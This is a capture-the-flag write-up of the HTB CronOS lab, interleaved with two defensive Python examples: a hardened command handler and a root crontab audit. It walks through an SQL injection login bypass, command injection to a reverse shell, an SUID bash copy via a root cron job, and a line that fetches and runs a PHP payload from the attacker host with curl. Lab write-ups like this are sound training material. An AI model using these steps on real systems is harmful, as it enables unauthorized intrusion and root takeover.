HTB CronOS Writeup
nmap:
HTTP enum:
The default Apache2 server page was found.
Try nslookup: start nslookup, then type server followed by the target IP so the box itself answers the queries.
Now that we see it is hosting cronos.htb, let's try a zone transfer to discover any other subdomains:
dig AXFR cronos.htb @IP
Gobuster didn't have any luck.
Save the subdomains found to /etc/hosts.
Found the admin page.
Try SQL injection:
Save the POST request as login.req and run:
sqlmap -r login.req
Only redirects were happening.
Tried using '-- - in the username field and it worked! (Intercept the traffic in Burp Suite and URL-encode it.)
Now we can execute any commands!
Adjusting the command field in Burp Suite, I was able to execute a command.
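A command field that the server hands to a shell is what makes the step above possible. As an added example (not the box's PHP; the tool names, the argument lists and the two-field form layout are assumptions), the following Python shows the unsafe pattern beside a hardened handler that allowlists the tool, validates the host against a hostname grammar and execs the binary without a shell.

```python
import re
import subprocess
from typing import List

# Hypothetical allowlist: form value -> fixed argv prefix. Nothing else can ever run.
ALLOWED_TOOLS = {
    "ping": ["ping", "-c", "1"],
    "traceroute": ["traceroute", "-m", "10"],
}

# Hostname or dotted IPv4 only: labels of letters, digits and hyphens joined by dots.
# Shell metacharacters (; | & $ ` ( ) and whitespace) cannot match, nor can a leading '-'
# that would be parsed as an option by the tool.
HOST_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)

def vulnerable_run(command: str, host: str) -> str:
    """The pattern to avoid: one string handed to a shell, so metacharacters in host
    (or a swapped command value) run as additional commands."""
    proc = subprocess.run(command + " " + host, shell=True, capture_output=True, text=True)
    return proc.stdout + proc.stderr

def build_argv(tool: str, host: str) -> List[str]:
    """Validate both fields and return the argv list; raise ValueError otherwise."""
    if tool not in ALLOWED_TOOLS:
        raise ValueError(f"tool not allowed: {tool!r}")
    if not HOST_RE.match(host):
        raise ValueError(f"invalid host: {host!r}")
    return ALLOWED_TOOLS[tool] + [host]

def is_valid_request(tool: str, host: str) -> bool:
    try:
        build_argv(tool, host)
        return True
    except ValueError:
        return False

def run_tool(tool: str, host: str, timeout: float = 10.0) -> str:
    """Hardened handler: argv list and shell=False, so the kernel execs the binary
    directly and no shell ever parses user input."""
    argv = build_argv(tool, host)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout, check=False)
    return proc.stdout + proc.stderr

if __name__ == "__main__":
    print(build_argv("ping", "cronos.htb"))          # ['ping', '-c', '1', 'cronos.htb']
    print(is_valid_request("ping", "cronos.htb; id"))  # False
```

Rejecting rather than escaping is the point: an escaper has to anticipate every shell construct, whereas a grammar for the one thing the field may contain does not.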
Let's try a one-liner to get a reverse shell.
Tried:
Make sure to URL-encode it. Got the reverse shell!
Upgraded the shell with python -c 'import pty; pty.spawn("/bin/sh")'
PrivEsc
Host linpeas.sh and run it.
Found a suspicious cron job:
php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
The tasks this scheduler runs are defined in:
"app/Console/Kernel.php"
How to set up a scheduled task that runs terminal commands:
https://vegibit.com/scheduling-commands-and-tasks-in-laravel/
find / -name Kernel.php 2>/dev/null
I located the file under the html directory and downloaded it by visiting the site.
Used this guy's method:
https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/
let's just make a temporary copy of bash (as root) and give it the SUID bit.
We add the following code to Kernel.php:
…
…then wait a minute for the cron job to run and execute ./sbash -p from /tmp.
Another method would be to edit the artisan file and let the system download a reverse shell from our host and execute it:
<?php system('curl http://10.10.14.57/reverse.php | php') ?>
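Both privilege-escalation routes above work for the same reason: a cron job running as root executes PHP files (artisan and the Kernel.php it loads) that the web user owns and can edit. As an added example (not from the writeup or from linpeas), this Python audit parses a system-format crontab and reports root jobs whose referenced paths are owned by, or writable for, a non-root user. The crontab text is a constructed sample that includes the scheduler line found on the box; the lookup callback defaults to os.stat but can be replaced so the check runs against captured file metadata.

```python
import os
import re
import stat
from typing import Callable, Dict, List, Optional, Tuple

# Constructed sample of /etc/crontab (five time fields, user, command).
# The last job is the scheduler entry found on the box.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""

# Absolute paths inside a command line (simplified: no quoting or globbing).
PATH_RE = re.compile(r"(?<![\w./-])(/[\w./-]+)")
IGNORED_PREFIXES = ("/dev/", "/proc/")

StatInfo = Tuple[int, int, int]  # (st_mode, st_uid, st_gid)

def parse_system_crontab(text: str):
    """Yield (user, command) for every job line; skip comments and VAR=value lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):              # @reboot/@daily form: two leading fields
            fields = line.split(None, 2)
            if len(fields) == 3:
                yield fields[1], fields[2]
            continue
        fields = line.split(None, 6)          # m h dom mon dow user command
        if len(fields) == 7:
            yield fields[5], fields[6]

def extract_paths(command: str) -> List[str]:
    return [p for p in PATH_RE.findall(command) if not p.startswith(IGNORED_PREFIXES)]

def os_lookup(path: str) -> Optional[StatInfo]:
    try:
        st = os.stat(path)
    except OSError:
        return None                            # missing, or a bare binary resolved via PATH
    return (st.st_mode, st.st_uid, st.st_gid)

def weak_ownership_reason(info: StatInfo) -> Optional[str]:
    """Explain why a non-root user could change this path, or None if it looks fine."""
    mode, uid, gid = info
    if uid != 0:
        return f"owned by uid {uid}, not root"
    if mode & stat.S_IWOTH:
        return "world-writable"
    if mode & stat.S_IWGRP and gid != 0:
        return f"writable by gid {gid}"
    return None

def audit_crontab(text: str,
                  lookup: Callable[[str], Optional[StatInfo]] = os_lookup) -> List[Dict[str, str]]:
    """Findings for root jobs whose referenced paths a non-root user could modify."""
    findings: List[Dict[str, str]] = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for path in extract_paths(command):
            info = lookup(path)
            if info is None:
                continue
            reason = weak_ownership_reason(info)
            if reason:
                findings.append({"path": path, "command": command, "reason": reason})
    return findings

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"{f['path']}: {f['reason']}  <- {f['command']}")
```

The check only looks at the paths named on the cron line; an interpreter like php then loads further files from the same tree, so the practical fix is to keep the whole application directory owned by root (or run the scheduler as the web user instead of root) rather than to fix one file.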